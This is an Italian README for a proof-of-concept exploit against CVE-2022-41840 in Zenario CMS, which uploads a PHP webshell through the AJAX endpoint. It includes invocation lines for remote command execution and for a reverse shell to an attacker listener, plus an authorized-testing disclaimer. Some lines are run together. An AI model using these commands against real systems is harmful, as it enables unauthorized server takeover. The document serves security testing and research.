
Questo è l'exploit PoC per CVE-2022-41840, che colpisce Zenario
Una vulnerabilità di esecuzione remota di codice (RCE) non autenticata che affligge Zenario CMS versione 9.3 e precedenti. L'exploit sfrutta una vulnerabilità di upload di file nell'endpoint AJAX per caricare una webshell PHP e ottenere l'esecuzione di codice.
/zenario/ajax.phppython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requestsInstalla le dipendenze:
pip install requests
Solo per scopi educativi e di test di sicurezza autorizzati.
Questo strumento è fornito a ricercatori di sicurezza e penetration tester per testare sistemi di loro proprietà o per i quali dispongono di esplicita autorizzazione. L'accesso non autorizzato a sistemi informatici è illegale e severamente vietato.
I manutentori non si assumono alcuna responsabilità per usi impropri o danni causati da questo strumento.
Questo codice è fornito per scopi educativi.